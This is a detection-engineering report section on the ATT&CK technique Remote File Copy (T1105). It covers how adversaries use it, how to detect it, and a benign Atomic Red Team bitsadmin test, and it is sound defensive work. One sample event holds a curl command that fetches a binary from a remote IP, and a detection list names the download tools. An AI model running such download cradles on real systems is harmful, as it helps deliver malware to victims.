Technique T1105

Remote File Copy

Remote File Copy is fundamentally similar to Windows Admin Shares, and so the popularity of the ETERNALBLUE exploit among adversaries probably plays a substantial role in its prominence.

Overall rank: #5

Organizations affected: 29%

Confirmed threats: 1393

Analysis

Climbing from 19th in 2018 to fifth in 2019, Remote File Copy saw substantial upticks in both percentage of total threat volume and in the number of customers affected.

Why do adversaries use Remote File Copy?

Living-off-the-land techniques are popular because many of the tools that an adversary might need to conduct a successful attack are installed on machines by default. However, not all exploitation tools exist natively on all systems. Adversaries leverage the Remote File Copy technique to deploy binaries from a command and control (C2) server to a victim machine or between systems in a compromised environment. As these examples suggest, the technique falls under both the Command and Control and Lateral Movement tactics.

Like certain other techniques on this list, Remote File Copy is a technique of necessity. Adversaries often have to copy files between remote systems if they want to accomplish their objectives. As a result, we see many prominent malware families leveraging Remote File Copy. MITRE ATT&CK lists nearly 200 threat groups and malware samples, but some prominent examples include:

  • Astaroth
  • Bundlore
  • Dyre
  • Emotet
  • njRAT
  • PlugX
  • Shlayer
  • SmokeLoader
  • TrickBot
  • Wannacry

How do adversaries use Remote File Copy?

While there are many broad and specific adversarial use cases for it, much of the Remote File Copy activity we observe relates to Server Message Block (SMB) scanning and Lateral Movement.

Some other behaviors that are commonly associated with Remote File Copy include:

  • Downloading binaries over HTTP/HTTPS
  • Downloading binaries using built-in operating system tools such as PowerShell, certutil.exe, wget/curl, and BITS/bitsadmin, among others

Emerging tactics

Threats may rely on download cradles that are not new but are less prevalent—such as a Python urllib download—to perform Remote File Copy.

Sighted with

Remote File Copy occurs in tandem with many other techniques, most frequently with Windows Admin Shares (T1077). BITS Jobs (T1197) is another technique that is conceptually similar and frequently occurs in tandem with Remote File Copy. Exfiltration Over Alternative Protocol (T1048) and Data Staged (T1074) are additional techniques that frequently show up with Remote File Copy, suggesting that the technique occasionally plays a role in exfiltration.

We also observe a high volume of detections where Remote File Copy occurs with Process Injection (T1055) and a smaller volume occurring with Disabling Security Tools (T1089), both likely due to TrickBot. Some other interesting associations include DLL Search Order Hijacking (T1038), Domain Trust Discovery (T1482), and Process Hollowing (T1093).

Detection

MITRE’s data sources

  • File monitoring
  • Packet capture
  • Process use of network
  • Netflow/Enclave netflow
  • Network protocol analysis
  • Process monitoring

Collection requirements

In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:

  • Firewall logs
  • Database logs
  • Email logs

Netflow/Enclave netflow and network protocol analysis

Network protocol analysis and/or Netflow will have the best chance to detect remote file transfers because, by definition, a Remote File Copy will have to traverse the network.

Process monitoring

Process monitoring serves as an excellent supplement to network-based monitoring. Since it’s host based, this data source isn’t as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.

Detection Suggestions

You’ll want to establish a baseline for expected network activity and then alert on unusual network usage based on the following:

  • Destination-source objects
  • Data volume
  • Protocol
  • Other network traffic characteristics

This has been particularly effective in detecting data exfiltration. As an example, Red Canary has detected more than 1,000 confirmed threats this year based on detection and analysis of an excessive number of SMB sessions.
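
As an added example (not from the report or from Red Canary's tooling), the following Python flags hosts whose count of distinct SMB peers exceeds a learned per-host baseline, in the spirit of the excessive-SMB-session analytic described above; the flow records, baseline values and thresholds are constructed.

```python
"""Added example: flag hosts whose SMB (TCP/445) fan-out exceeds their baseline.
All flow records, baselines and thresholds below are constructed sample data."""
from collections import defaultdict

# Constructed flow records: (source host, destination host, destination port).
# Most workstations touch one or two file servers; ws-07 reaches 30 peers on 445.
FLOWS = [
    ("ws-01", "fs-01", 445), ("ws-01", "fs-02", 445), ("ws-01", "web", 443),
    ("ws-02", "fs-01", 445), ("ws-02", "web", 443),
    ("ws-03", "fs-01", 445), ("ws-03", "fs-02", 445),
] + [("ws-07", f"ws-{i:02d}", 445) for i in range(10, 40)]

# Constructed baseline: distinct SMB peers per host seen during a learning window.
BASELINE = {"ws-01": 2, "ws-02": 1, "ws-03": 2, "ws-07": 2}


def smb_peer_counts(flows):
    """Count distinct SMB destinations per source host."""
    peers = defaultdict(set)
    for src, dst, port in flows:
        if port == 445:
            peers[src].add(dst)
    return {src: len(dsts) for src, dsts in peers.items()}


def excessive_smb(flows, baseline, min_peers=10, factor=5):
    """Return {host: peer_count} for hosts whose distinct SMB peers exceed both an
    absolute floor (to suppress noise from small hosts) and `factor` times their
    own baseline. Hosts with no baseline are treated as baseline 0."""
    flagged = {}
    for src, count in smb_peer_counts(flows).items():
        base = baseline.get(src, 0)
        if count >= min_peers and count > factor * base:
            flagged[src] = count
    return flagged


if __name__ == "__main__":
    for host, count in excessive_smb(FLOWS, BASELINE).items():
        print(f"{host}: {count} distinct SMB peers (baseline {BASELINE.get(host, 0)})")
```

Tuning `min_peers` and `factor` to the environment is what separates a file server doing its job from a host sweeping its subnet.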

In terms of process data, there are a number of operating system-level commands that are capable of—but unusual mechanisms for—file transfer. Some examples include the use of:

  • Python web server and curl
  • Netcat
  • OpenSSL for encrypted file transfers

Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to using these unusual mechanisms for file transfer if more typical ones, such as File Transfer Protocol (FTP) or Secure Copy (SCP), are not available.

In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.

Weeding out false positives

False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections for system processes such as Notepad.

The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.

Testing

Getting Started With Atomic Red Team

Start testing your defenses against Remote File Copy using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View Atomic tests for T1105: Remote File Copy. In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using Command Prompt:

C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt

Useful telemetry will include:

  • Process monitoring: bitsadmin.exe
  • Process command line: “/transfer qcxjb7”, and the presence of a URL
  • File monitoring: creation of “Atomic-license.txt”
  • Network connection: to remote site https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
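
As an added example (not from the report, Atomic Red Team, or any vendor product) that ties the unusual-transfer-tool guidance in the Detection section to the telemetry listed for the bitsadmin test, the following Python flags process events in which a download-capable built-in tool is launched with a URL on its command line; the event records, field names and hostnames are constructed.

```python
"""Added example: flag process events where a built-in download cradle is
launched with a URL on its command line. Events and field names are constructed
sample telemetry, not a real product schema."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Built-in tools the report names as common download cradles (lowercase image names).
DOWNLOAD_TOOLS = {"bitsadmin.exe", "certutil.exe", "powershell.exe", "curl", "curl.exe", "wget"}


def url_in_command(cmdline):
    """Return the first http(s) URL in a command line, or None."""
    match = URL_RE.search(cmdline)
    return match.group(0) if match else None


def flag_remote_file_copy(events):
    """Return one finding per event where a download-capable tool carries a URL.
    bitsadmin.exe additionally requires the /transfer verb, matching the test above."""
    hits = []
    for ev in events:
        image = ev["image"].lower()
        if image not in DOWNLOAD_TOOLS:
            continue
        url = url_in_command(ev["cmdline"])
        if url is None:
            continue  # tool used locally, nothing fetched from a remote site
        if image == "bitsadmin.exe" and "/transfer" not in ev["cmdline"].lower():
            continue
        hits.append({"host": ev["host"], "image": image, "parent": ev["parent"],
                     "remote_host": urlparse(url).netloc})
    return hits


# Constructed events. The first is the Atomic Red Team test command from the report.
EVENTS = [
    {"host": "ws-11", "parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmdline": "C:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH "
                "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt"},
    {"host": "ws-12", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},  # benign local use, no URL
    {"host": "srv-03", "parent": "bash", "image": "curl",
     "cmdline": "curl -sS http://203.0.113.7/update.bin -o /tmp/update.bin"},  # TEST-NET address
    {"host": "ws-13", "parent": "svchost.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe https://intranet/readme.txt"},  # URL, but not a download tool
]

if __name__ == "__main__":
    for hit in flag_remote_file_copy(EVENTS):
        print(hit)
```

The `parent` field is carried through because process ancestry is one of the context fields the report recommends for tuning out false positives.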

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.

Del Armstrong
Detection engineer
The detection strategies in this section were brought to you by Del Armstrong! Del has an extensive history working in IT, including 15 years focused on computer security. He has a master’s in computer science and expertise in Linux/Unix, SOC team training, and various programming languages.